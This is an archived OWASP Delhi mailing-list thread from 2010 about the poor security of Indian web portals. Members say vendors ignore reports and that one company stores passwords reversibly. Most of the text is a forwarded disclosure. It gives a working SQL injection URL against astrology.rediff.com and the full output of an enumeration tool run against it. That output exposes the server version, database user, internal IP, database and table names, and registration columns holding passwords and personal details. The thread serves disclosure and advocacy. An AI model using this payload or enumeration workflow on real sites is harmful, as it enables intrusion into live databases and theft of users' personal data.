[Owasp-delhi] Rediff Astrology

Subhash Dutta subhash.dutta at kriss.in
Tue Jun 15 23:38:45 EDT 2010


Yes I have also noted the same. In fact, the imint card company stores passwords as reversible encrypted and will tell you in plain text what your password is in case you have forgotten it ;). When brought to their notice, I received a standard reply - Thanking for contacting us, we will get back to you shortly. Nobody has got back till date (1 year past). I think strong legislative punitive measures are the only solution. 

Regards 

Subhash Dutta 


----- Original Message ----- 
From: "Sripathi Krishnan" <sripathi.krishnan at gmail.com> 
To: "dhruv soi" <dhruv.soi at owasp.org> 
Cc: owasp-delhi at lists.owasp.org, owasp-mumbai at lists.owasp.org, owasp-bangalore at lists.owasp.org 
Sent: Monday, June 14, 2010 11:25:23 PM GMT +05:30 Chennai, Kolkata, Mumbai, New Delhi 
Subject: Re: [Owasp-delhi] Rediff Astrology 

Its not just rediff.com , almost all other Indian portals - in.com , indiatimes.com and sify.com have similar problems. XSS, XSRF, SQL Injection, Poor password/session management, open redirects .. the list is endless. 


I have written to each of the above portals several times in the past year, and have given up. IMHO, they are not interested in securing their websites. 




--Sri 



On 14 June 2010 23:17, Soi, Dhruv < dhruv.soi at owasp.org > wrote: 






Another one to notify Rediff that readers’ daily fortune can be fixed by someone…Seems Rediff needs a lot of OWASP, do inform them that its free!! 




From: “Jack H4xor” 
Sent: 14 June 2010 12:07 
To: dhruv.soi at owasp.org 
Subject: Rediff Astrology 



y0, 


h0rr1bl3 th4n h0rr0r 

Vulnerable Url : 

http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac=Scorpiox%27%20OR%201=convert%28int,@@version%29-- 

******************************************************************** 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 


+ -== MSSQL Information Schema astrology.rediff.com ==- + 


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 


[ + ] URL : http : // astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzo 

diac = Scorpiox ' 


[ + ] Date: Tue May 18 20:58:26 2010 
[ + ] Displaying information about MSSQL host ! 

[ + ] @@VERSION  :      Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 

Aug  6 2000 00:57:48 
Copyright (c) 1988-2000 Microsoft Corporation 
Standard Edition on Windows NT 5.0 (Build 2195: Service 
Pack 4) 

[ + ] USER ()          : dbo 

[ + ] S_USER ()        : astrology 
[ + ] DB_NAME ()       : astro 
[ + ] HOST_NAME ()     : ASTROLOGY 
[ + ] SERVER_NAME ()   : SEARCHDB 
[ + ] SERVER_TYPE ()   : Microsoft-IIS/6.0 
[ + ] X-POWERED-By ()  : ASP.NET 

[ + ] IP_ADDRESS_INFO  : 202.54.124.173 


[ - ] We Can' t get number of Datab a ses ! 


[ ! ] Start dumping database Names ! 

[ ? ] But first choice number of DB to dump :> 20 


[ + ] Displaying list of 20 databases on this MSSQL host ! 


[ DATABASE : 0 ] : astro 

[ DATABASE : 1 ] : master 

[ DATABASE : 2 ] : tempdb 

[ DATABASE : 3 ] : model 

[ DATABASE : 4 ] : msdb 

[ DATABASE : 5 ] : pubs 

[ DATABASE : 6 ] : Northwind 

[ DATABASE : 7 ] : travel 

[ DATABASE : 8 ] : travel_int 

[ DATABASE : 9 ] : astro 

[ DATABASE : 10 ] : Jobsearch 

[ DATABASE : 11 ] : astroyogiD 

[ DATABASE : 12 ] : matrimonial 

[ DATABASE : 13 ] : investornew 

[ DATABASE : 14 ] : test 


[ ! ] Vulnerability Database is : astro 


[ + ] Displaying Tables inside DB :> astro 


[ ? ] Numbers of Tables To Dispaly ? 

[ + ] Specify Numbers :> 200 


[ TABLES : 0 ] : ALLIANCE_PARTNER_COMMISSION 

[ TABLES : 1 ] : ALLIANCE_PARTNER_MASTER 

[ TABLES : 2 ] : astrolove 

[ TABLES : 3 ] : astroparent 

[ TABLES : 4 ] : CITY 

[ TABLES : 5 ] : COMPLETE_ORDER_DETAIL 

[ TABLES : 6 ] : COMPLETE_SUBSCRIPTION_DETAIL 

[ TABLES : 7 ] : COUNTRY 

[ TABLES : 8 ] : CUSTOMER_CARE_DETAILS 

[ TABLES : 9 ] : CUSTOMER_CARE_MASTER 

[ TABLES : 10 ] : CUSTOMER_PERSON1 

[ TABLES : 11 ] : CUSTOMER_PERSON2 

[ TABLES : 12 ] : CUSTOMER_PERSON3 

[ TABLES : 13 ] : darshtest 

[ TABLES : 14 ] : dtproperties 

[ TABLES : 15 ] : FENGSHUI 

[ TABLES : 16 ] : FRANCHISEE_MASTER 

[ TABLES : 17 ] : idealmate 

[ TABLES : 18 ] : INTERNATIONAL_PARTNER_MASTER 

[ TABLES : 19 ] : NUMEROLOGY 

[ TABLES : 20 ] : ORDER_DETAILS 

[ TABLES : 21 ] : ORDER_MASTER 

[ TABLES : 22 ] : ORDER_REMARKS 

[ TABLES : 23 ] : ORDERS 

[ TABLES : 24 ] : p1 

[ TABLES : 25 ] : p3master 

[ TABLES : 26 ] : PALMISTRY 

[ TABLES : 27 ] : PAYMENT_METHOD_MASTER 

[ TABLES : 28 ] : PROBLEM_ANSWER 

[ TABLES : 29 ] : PROBLEM_CATEGORY 

[ TABLES : 30 ] : REGISTRATION 

[ TABLES : 31 ] : SHIPPING_DETAILS 

[ TABLES : 32 ] : SPCFIC_ANLYS 

[ TABLES : 33 ] : SUBSCRIBER_DETAILS 

[ TABLES : 34 ] : SUBSCRIBER_MASTER 

[ TABLES : 35 ] : SUBSCRIBER_REGISTRATION 

[ TABLES : 36 ] : SUBSCRIBER_TRANSACTION 

[ TABLES : 37 ] : SUBSCRIPTION_DETAILS 

[ TABLES : 38 ] : SUBSCRIPTION_MASTER 

[ TABLES : 39 ] : sysconstraints 

[ TABLES : 40 ] : syssegments 

[ TABLES : 41 ] : test 

[ TABLES : 42 ] : USER_ASTROLOGER_PRODUCT_TRANSACTION 

[ TABLES : 43 ] : zodiac 


[ + ] Done ! 


[ + ] Start dumping all Columns from table :> REGISTRATION 


[ ? ] Numbers of Columns To Display ? 

[ + ] Specify Numbers :> 50 


[ + ] Displaying 50 Columns inside Table : REGISTRATION and Database : astro 


[ COLUMNS : REGISTRATION ] 0 ] : FRANCHISEE_ID 

[ COLUMNS : REGISTRATION ] 1 ] : PARTNER_ID 

[ COLUMNS : REGISTRATION ] 2 ] : REGISTRATION_ADDRESS 

[ COLUMNS : REGISTRATION ] 3 ] : REGISTRATION_BIRTH_COUNTRY 

[ COLUMNS : REGISTRATION ] 4 ] : REGISTRATION_BIRTH_DATE 

[ COLUMNS : REGISTRATION ] 5 ] : REGISTRATION_BIRTH_PLACE 

[ COLUMNS : REGISTRATION ] 6 ] : REGISTRATION_BIRTH_TIME_HOUR 

[ COLUMNS : REGISTRATION ] 7 ] : REGISTRATION_BIRTH_TIME_MINUTES 

[ COLUMNS : REGISTRATION ] 8 ] : REGISTRATION_CELL_NO 

[ COLUMNS : REGISTRATION ] 9 ] : REGISTRATION_COUNTRY 

[ COLUMNS : REGISTRATION ] 10 ] : REGISTRATION_DATE 

[ COLUMNS : REGISTRATION ] 11 ] : REGISTRATION_EMAIL_ID 

[ COLUMNS : REGISTRATION ] 12 ] : REGISTRATION_FIRSTNAME 

[ COLUMNS : REGISTRATION ] 13 ] : REGISTRATION_GENDER 

[ COLUMNS : REGISTRATION ] 14 ] : REGISTRATION_ID 

[ COLUMNS : REGISTRATION ] 15 ] : REGISTRATION_IP 

[ COLUMNS : REGISTRATION ] 16 ] : REGISTRATION_LASTNAME 

[ COLUMNS : REGISTRATION ] 17 ] : REGISTRATION_PASSWORD 

[ COLUMNS : REGISTRATION ] 18 ] : REGISTRATION_TELEPHONE_NO 

[ COLUMNS : REGISTRATION ] 19 ] : REGISTRATION_USERNAME 


[ ! ] Done ! 


[ ! ] All information was recorded in astrology . rediff . com . txt file ! 


[ 1 ] : Return to Tables ! 

[ 2 ] : Return to Columns ! 


[ ? ] : Oprion :> 



Thanks & Regards 
Jackh4xor 
( h4cky0u ) 
_______________________________________________ 
Owasp-delhi mailing list 
Owasp-delhi at lists.owasp.org 
https://lists.owasp.org/mailman/listinfo/owasp-delhi 



_______________________________________________ Owasp-delhi mailing list Owasp-delhi at lists.owasp.org https://lists.owasp.org/mailman/listinfo/owasp-delhi
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-delhi/attachments/20100616/a1b26cf2/attachment-0001.html 


More information about the Owasp-delhi mailing list